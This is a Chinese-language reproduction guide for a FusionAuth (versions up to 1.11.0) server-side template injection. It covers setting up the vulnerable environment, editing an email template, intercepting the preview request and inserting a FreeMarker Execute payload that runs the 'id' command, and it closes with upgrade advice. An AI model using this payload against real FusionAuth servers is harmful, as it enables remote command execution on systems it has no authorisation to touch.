跳转至

简介

FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。

影响版本

FusionAuth <= 1.11.0

环境搭建

下载 FusionAuth 1.10.0

wget https://storage.googleapis.com/inversoft_products_j098230498/products/fusionauth/1.10.0/fusionauth-app-1.10.0.zip

img

wget https://www.elastic.co/cn/downloads/past-releases/elasticsearch-6-8-6

启动 MySQL /etc/init.d/mysql start

启动 ElasticSearch systemctl start elasticsearch.service

启动 FusionAuth bin/startup.sh

img

img

http://Your-ip:9011打开网站

img

配置 FusionAuth

img

配置 Elastic Search

img

img

img

img

漏洞复现

进入 setting -> email template

然后编辑

img

点击 Preview,抓包

img

修改



emailTemplate.defaultHtmlTemplate



为



${"freemarker.template.utility.Execute"?new()("id")}

img

img

修复建议

升级到最新版